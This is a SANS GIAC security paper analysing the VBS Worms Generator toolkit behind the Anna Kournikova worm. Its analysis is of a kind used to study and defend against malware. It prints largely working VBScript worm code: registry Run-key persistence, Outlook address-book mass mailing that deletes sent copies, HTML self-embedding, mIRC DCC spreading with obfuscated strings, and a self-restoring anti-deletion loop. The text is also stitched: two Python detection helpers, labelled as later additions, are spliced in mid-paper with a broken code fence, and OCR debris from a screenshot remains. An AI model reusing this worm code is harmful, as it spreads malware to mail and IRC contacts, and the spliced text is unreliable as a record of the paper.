VBS Worms Generator

Global Information Assurance Certification Paper

Copyright SANS Institute
Author Retains Full Rights
This paper is taken from the GIAC directory of certified professionals. Reposting is not permitted without express written permission.

Alberto Grazi
GSEC - GIAC LevelOne Security Essentials Certification

Introduction

The “VBS Worms Generator” (from now on vbswg) is a worm generator for Windows written by a 17-year-old boy whose name is [K]Alamar [1]. With the words “worm generator” we mean a software tool which is able to generate customisable virus code.

This software, in particular, lets the creator customize most of the aspects of the behaviour of the virus. However, a single skeleton is used with many plug-ins, and the user can choose which ones to activate.

This tool is particularly infamous because it was the one used at the beginning of February 2001 to create the “Anna Kournikova” worm [2], which in a few days managed to infect thousands of computers worldwide. The worm was generated by a 20-year-old man who goes by the name of OnTheFly and who didn’t realize the damage he was about to inflict: he could now be facing a prison sentence of up to four years [3].

This is a screen shot of how the program’s console looks:


-2
00
20
te
tu
sti
In
NS
SA
©

Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46

© SANS Institute 2000 - 2002 As part of GIAC practical repository. Author retains full rights.
Here is a list of all the possible features:

• Start with Windows (by registry key): the worm will be activated every time Windows starts
• Worm backup: a copy of the worm’s code will be copied in a safe location on the victim’s machine
• Outlook replication: this is the mechanism the virus will use to spread itself by email. Two options are available: to send attachments or to send HTML code with the virus embedded
• Mirc replication: a script is written into the Mirc directory (found by looking for the initialisation file mirc.ini) in order to spread the worm by IRC
• Pirch replication: same principle used by the Mirc replication, but the Pirch initialisation file is changed
• Other files infected: a search on all the disks (network drives included) will be performed and the worm will overwrite itself onto all the files with extension .vbe and .vbs. It will also search for the files mirc.ini and pirch.ini in order to detect installations of Mirc and Pirch
• Payloads: it is possible to add some actions to be performed by the virus on a specific date: display a message with a picture in an alert box, open a web page or crash the system using two different methods
• Anti deletion method: the worm stays resident as a running process and re-creates its source file if the original is deleted
• Crypt code: the code of the virus is encrypted
• Download and execute files: a URL chosen by the “attacker” will become the default home page for IE. If the URL points to a malicious file, once downloaded it will be executed

The source code

Let’s now examine in detail the source code generated by vbswg for some of the sections.

All the code generated by this tool is obfuscated in a very simple but effective form (unless the strong encryption is chosen): all the names of variables and functions are randomly generated, and the strings are initialised with concatenations of the ASCII values of the characters (calls to Chr() joined with the & operator). This makes it more difficult for an inexperienced person to debug and understand what the code does.

In the examples shown here all the variables are in clear text and the registry keys are shown with their proper names, although I have omitted a few lines of code, substituting them with some comments.
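A small tool to undo the string obfuscation just described, as an added example that is not part of the original paper or of vbswg: it folds runs of Chr(n) joined with & back into VBScript string literals and then merges adjacent literals, which is usually enough to make a generated worm readable. The sample input is constructed for this example (the identifier qzv is an invented stand-in for a random name; the second line mirrors the Mirc routine shown later). It is a regex pass, not a VBScript parser, so it leaves control characters as Chr(n) and does not rename the randomised identifiers.

```python
"""Fold vbswg-style Chr()-concatenation strings back into VBScript literals.
Added example; not code from the paper or from vbswg."""
import re

# One Chr(<code>) call: Chr(104), chr( 99 ), CHR(34) ...
_CHR = r'\b[Cc][Hh][Rr]\s*\(\s*(\d{1,3})\s*\)'
_CHR_CALL = re.compile(_CHR)
# A run of one or more Chr() calls joined by VBScript's & operator.
_CHR_RUN = re.compile(_CHR + r'(?:\s*&\s*' + _CHR + r')*')
# Two adjacent string literals joined by &; a doubled "" inside a literal is an escaped quote.
_LIT_PAIR = re.compile(r'"((?:[^"]|"")*)"\s*&\s*"((?:[^"]|"")*)"')

# Constructed sample in the style of the generated code (qzv is an invented random name).
SAMPLE = '\n'.join([
    'Set qzv = CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112)'
    ' & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108))',
    r'Script.writeline "n2= /." & chr(100) & chr(99) & chr(99) & " send $nick c:\windows\worm.vbs"',
    'x = Chr(34) & Chr(72) & Chr(105) & Chr(34) & Chr(13) & Chr(10)',
])


def _literal(chars):
    """Render a list of characters as a VBScript literal (embedded quotes are doubled)."""
    return '"' + ''.join(chars).replace('"', '""') + '"'


def _fold_run(match):
    """Replace one Chr() & Chr() ... run with literal(s); control characters stay as Chr(n)."""
    codes = [int(c) for c in _CHR_CALL.findall(match.group(0))]
    parts, printable = [], []
    for code in codes:
        if 32 <= code <= 126:          # printable ASCII goes into the current literal
            printable.append(chr(code))
        else:                          # CR, LF, etc. are kept as Chr(n) for readability
            if printable:
                parts.append(_literal(printable))
                printable = []
            parts.append('Chr(%d)' % code)
    if printable:
        parts.append(_literal(printable))
    return ' & '.join(parts)


def deobfuscate_line(line):
    """Fold Chr() runs, then merge adjacent literals until nothing changes."""
    line = _CHR_RUN.sub(_fold_run, line)
    while True:
        merged = _LIT_PAIR.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), line)
        if merged == line:
            return line
        line = merged


def deobfuscate(source):
    """Apply deobfuscate_line to every line of a script."""
    return '\n'.join(deobfuscate_line(l) for l in source.splitlines())


if __name__ == '__main__':
    print(deobfuscate(SAMPLE))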
Start with Windows

    Set ws = CreateObject("WScript.Shell")
    ws.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{regkey}", "wscript.exe c:\windows\{worm}.vbs %"

This code creates a registry value under the Run key whose data is executed every time Windows is started. The name of the registry value ({regkey}) and the name of the file executed ({worm}.vbs) are parametric and decided by the “attacker” (who is generating the worm).
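A check a responder can run over the output of `reg query` for the Run key to spot this persistence, as an added example that is not taken from the paper: it flags values that invoke wscript.exe or cscript.exe, or that point directly at a .vbs/.vbe file, and pulls out the script path to collect. The key listing below is constructed; the value names xkqzr and jvltm are invented stand-ins for the random {regkey} name. The same parse applies unchanged to the HKCU Run key output.

```python
"""Flag Run-key values that start a VBScript at logon. Added example, not from the paper."""
import re

# Constructed sample of what `reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` prints.
SAMPLE_RUN_KEY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    xkqzr             REG_SZ           wscript.exe c:\windows\xkqzr.vbs %
    Updater           REG_SZ           "C:\Program Files\Vendor\updater.exe" /background
    jvltm             REG_SZ           c:\windows\jvltm.vbe
"""

# One value line: <name> REG_SZ|REG_EXPAND_SZ <data>
_VALUE = re.compile(r'^\s*(\S+)\s+REG_(?:EXPAND_)?SZ\s+(.*\S)\s*$')
# Windows Script Host executables, with or without the .exe suffix.
_SCRIPT_HOST = re.compile(r'(?i)\b[wc]script(?:\.exe)?\b')
# A .vbs/.vbe path without spaces (quoted paths with spaces would need extra handling).
_SCRIPT_PATH = re.compile(r'(?i)\S+\.vb[se]\b')


def suspicious_run_entries(reg_query_output):
    """Return one dict per Run value that launches a script host or a VBScript file."""
    hits = []
    for line in reg_query_output.splitlines():
        m = _VALUE.match(line)
        if not m:
            continue
        name, data = m.groups()
        path = _SCRIPT_PATH.search(data)
        if _SCRIPT_HOST.search(data) or path:
            hits.append({'value': name,
                         'command': data,
                         'script': path.group(0) if path else None})
    return hits


if __name__ == '__main__':
    for hit in suspicious_run_entries(SAMPLE_RUN_KEY):
        print(hit)
```

The `SecurityHealth` and `Updater` values are left alone: the check keys on the script host and on the script extension, not on the value name, because the name is random in this family.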
Outlook replication by attachment

    Function Outlook()
    On Error Resume Next
    Set OutlookApp = CreateObject("Outlook.Application")
    ' The comparison relies on the default property of Outlook.Application (its Name, "Outlook")
    If OutlookApp = "Outlook" Then
        Set Mapi = OutlookApp.GetNameSpace("MAPI")
        Set mapiadlist = Mapi.AddressLists
        For Each Addresslist In mapiadlist
            If Addresslist.AddressEntries.Count <> 0 Then
                Addresslistcout = Addresslist.AddressEntries.Count
                For AddList = 1 To Addresslistcout
                    Set msg = OutlookApp.CreateItem(0)   ' 0 = olMailItem
                    Set AdEntries = Addresslist.AddressEntries(AddList)
                    msg.To = AdEntries.Address
                    msg.Subject = "Subject"
                    msg.Body = "Message Body"
                    Set Attachs = msg.Attachments
                    Attachs.Add "c:\windows\worm.vbs"
                    msg.DeleteAfterSubmit = True         ' leave no copy in Sent Items
                    If msg.To <> "" Then
                        msg.Send
                    End If
                Next
                ' registry: WScript.Shell object, assumed to be created among the globals in Main()
                registry.regwrite "HKCU\software\myworm\mailed", "1"
            End If
        Next
    End If
    End Function

This function is the one responsible for sending an email with an attachment to all the people in the address book of the victim’s computer. At first it is checked that there is at least one recipient in the address book, and then a new message is created for each entry, with a subject and body which are decided by the “attacker”.

Attached to this mail there is a copy of the worm itself, and the copies of the messages just sent are deleted (DeleteAfterSubmit) in order to remove any track of the action taken.

A registry key is also created to keep track of whether the virus has already been sent by email. Doing a comparison with the routine used by the “Love Letter” virus, it is possible to say that this one is less sophisticated because it doesn’t keep track of new additions to the address book: once mailed, the virus is not sent anymore.

Outlook Replication by HTML

    Function OutlookBody()
    On Error Resume Next
    Set fso = CreateObject("scripting.filesystemobject")
    Set Outlook = CreateObject("Outlook.Application")
    If Outlook = "Outlook" Then
        ' Read the worm's own source and turn each line into a quoted VBScript expression,
        ' so the script can be re-emitted inside the HTML page
        Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
        I = 1
        Do While Myself.atendofstream = False
            MyLine = Myself.readline
            Code = Code & Chr(34) & " & vbcrlf & " & Chr(34) & _
                Replace(MyLine, Chr(34), Chr(34) & " &chr(34) &" & Chr(34))
        Loop
        Myself.Close
        ' Lots of lines of code to create an HTML page which contains the source code
        ' of the worm. The variable is called HtmlBody
        Set mapi = Outlook.GetNameSpace("MAPI")
        Set Mapiadd = mapi.AddressLists
        For Each Addresslist In Mapiadd
            If Addresslist.AddressEntries.Count <> 0 Then
                AddCount = Addresslist.AddressEntries.Count
                Set Msg = Outlook.CreateItem(0)
                Msg.Subject = "Subject"
                Msg.HtmlBody = HtmlBody
                Msg.DeleteAfterSubmit = True
                ' One message per address list, every entry in BCC
                For II = 1 To AddCount
                    Set Addentry = Addresslist.AddressEntries(II)
                    If AddCount = 1 Then
                        Msg.BCC = Addentry.Address
                    Else
                        Msg.BCC = Msg.BCC & "; " & Addentry.Address
                    End If
                Next
                Msg.send
            End If
        Next
        Outlook.Quit
    End If
    End Function

This function creates and sends a new email message to all the recipients in the address book (one message per address list, with every entry placed in BCC). The subject is parametric, while the body is an HTML page with a copy of the worm itself, which runs on the victim’s computer as soon as he previews or opens the email, provided that his configuration allows the embedded ActiveX content to execute.

Mirc replication

    Function Mirc(Path)
    On Error Resume Next
    Set fso = CreateObject("scripting.filesystemobject")
    Set ws = CreateObject("wscript.shell")
    If Path = "" Then
        ' Locate the Mirc installation: two fixed directories, then Program Files from the registry
        If fso.fileexists("c:\mirc\mirc.ini") Then
            Path = "c:\mirc"
        End If
        If fso.fileexists("c:\mirc32\mirc.ini") Then
            Path = "c:\mirc32"
        End If
        PfDir = ws.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
        If fso.fileexists(PfDir & "\mirc\mirc.ini") Then
            Path = PfDir & "\mirc"
        End If
    End If
    If Path <> "" Then
        Set Script = fso.CreateTextFile(Path & "\script.ini", True)
        Script.writeline "[script]"
        Script.writeline "n0=on 1:JOIN:#:{"
        Script.writeline "n1= /if ( $nick == $me ) { halt }"
        ' chr(100) & chr(99) & chr(99) spells "dcc"
        Script.writeline "n2= /." & chr(100) & chr(99) & chr(99) & " send $nick c:\windows\worm.vbs"
        Script.writeline "n3=}"
        Script.Close
    End If
    End Function

This routine checks the existence of the Mirc software on the victim’s machine and writes an initialisation script in order to infect other users on IRC. To check if the software is installed, it looks for mirc.ini in two fixed directories (c:\mirc and c:\mirc32) and under the Program Files directory read from the registry. If the file exists, a new file called “script.ini” is created in that directory: its “on JOIN” handler will DCC-send the worm to every user who joins a channel the victim is in (the handler halts when the joining nick is the victim’s own). The string “dcc” is assembled from chr(100) & chr(99) & chr(99) to hide the command from a casual reader.
Antideletion method

    Function Antidelete()
    Set fso = CreateObject("scripting.filesystemobject")
    ' Keep a copy of the worm's own source in memory
    Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
    MyCode = Myself.readall
    Myself.Close
    Do
        If Not (fso.fileexists(wscript.scriptfullname)) Then
            Set Myself = fso.createtextfile(wscript.scriptfullname, True)
            Myself.write MyCode
            Myself.Close
        End If
    Loop
    End Function

If the creator chooses to activate this add-on, this will be the last function called by the worm because it never ends. The worm enters an infinite loop checking continuously whether its source file is still on the disk: if it has been deleted, it recreates the file from the copy kept in memory (MyCode).
Main()

The main section of the worm is the one responsible for setting up the global variables, saving the first copy of the worm on the victim’s file system and calling all the other functions. All the names of the variables and functions are randomly generated by vbswg, and their length is parametric.
Conclusion

Nowadays this virus is detected by most of the well-known antivirus software, but for a few days, while the antivirus companies were updating their signatures, it was a real threat. Vbswg itself is also detected by most AV software as a Trojan.

Again, users have to be educated to use the e-mail service: this can be enforced by company policies as far as work places are concerned, and it can be supported by restricting the default permissions of email readers and by displaying warnings and alerts. As reported on the “VX Heaven” web site: “Viruses don’t harm, ignorance does!”
Sources

[1] [K]Alamar Personal Home Page, http://virii.at/k/

[2] TrendMicro Virus Encyclopaedia, http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=VBS_KALAMAR.A

[3] “Man arrested over Kournikova virus”, 14 Feb 2001, BBC World Service, http://news.bbc.co.uk/hi/english/world/europe/newsid_1170000/1170176.stm

[4] Virus Heavens, Virus Creation Tools, http://vx.netlux.org/dat/vct.shtml

[5] VBScript Language Reference, Microsoft, http://msdn.microsoft.com/scripting/vbscript/doc/vbstoc.htm